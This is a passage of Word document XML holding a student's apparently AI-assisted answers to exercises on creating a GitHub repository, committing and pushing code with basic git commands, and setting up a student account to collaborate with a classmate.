    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pP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# 3. Create repo on GitHub via browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pP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# 4. Connect local repo to GitHub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git remote add origin https://github.com/your-username/my-first-code.git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRPr="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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branch -M main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>git push -u origin main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>8. Create a Github repository and document how to commit and push code changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sure! Here's a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>step-by-step guide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Create a GitHub repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>✍</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Commit and push code changes from your local machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📝 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Document everything clearly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🚀 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Create a GitHub Repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>“+” &gt; “New repository”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fill in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Repository name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>my-demo-app</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>(Optional) Add description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Private</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Create repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>You will now see instructions to push your code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💻 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Set Up Git Locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A. Open Terminal (Command Prompt / Git Bash)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B. Configure Git (if you haven't)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config --global user.name "Your Name"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config --global user.email "your@email.com"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">✨ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Initialize Local Repo &amp; Commit Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A. Create project folder and code file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mkdir my-demo-app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cd my-demo-app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echo 'print("Hello GitHub!")' &gt; hello.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B. Initialize Git &amp; Commit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init                    # Initialize Git repo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add hello.py           # Stage the file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commit -m "Initial commit"  # Commit with message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🌐 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Link with GitHub Repo &amp; Push</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Use the URL of the GitHub repo you just created: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remote add origin https://github.com/your-username/my-demo-app.git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branch -M main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push -u origin main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔒 If you're using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>2FA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>GitHub token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead of password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📖 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Documentation Summary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# How to Commit and Push Code to GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pP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## 1. Create a Repo on GitHub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o to https://github.com and click "New Repository". Name it and create it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pP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## 2. Clone or Initialize Locally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```bash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mkdir my-project &amp;&amp; cd my-project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init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Add Your Code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echo "print('Hello')" &gt; hello.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Stage and Commit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add hello.py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commit -m "Initial commit"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Connect to GitHub and Push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remote add origin https://github.com/your-username/my-project.git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branch -M main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push -u origin main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9. Create a student account on Github and collaborate on a small project with a classmate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Great initiative! Here’s how you can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>create a GitHub Student account</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>collaborate on a project with a classmate</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🎓 Step 1: Create a GitHub Student Account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Apply for GitHub Student Developer Pack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://education.github.com/pack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>“Get Student Benefits”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sign in to GitHub (or create a free account)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Provide:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>valid school-issued email address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>@edu.in</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Or upload a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>student ID</w:t>
      </w:r>
      <w:r>
        <w:t>/proof of enrollment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Submit the application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⏳ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Approval Time:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Usually within a few days</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Once approved, you get </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>free tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> like private repos, free domains, IDEs, cloud credits, and more!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>👥 Step 2: Create a Repository to Collaborate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A. Create a New Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"New"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name it (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>student-collab-project</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set it to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Public or Private</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Create Repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B. Add a Classmate as Collaborator:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to the repo’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Settings &gt; Collaborators</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Add people</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter your classmate's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>GitHub username or email</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRPr="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Invite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Your classmate will receive an invitation. Once accepted, you both can work on the repo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
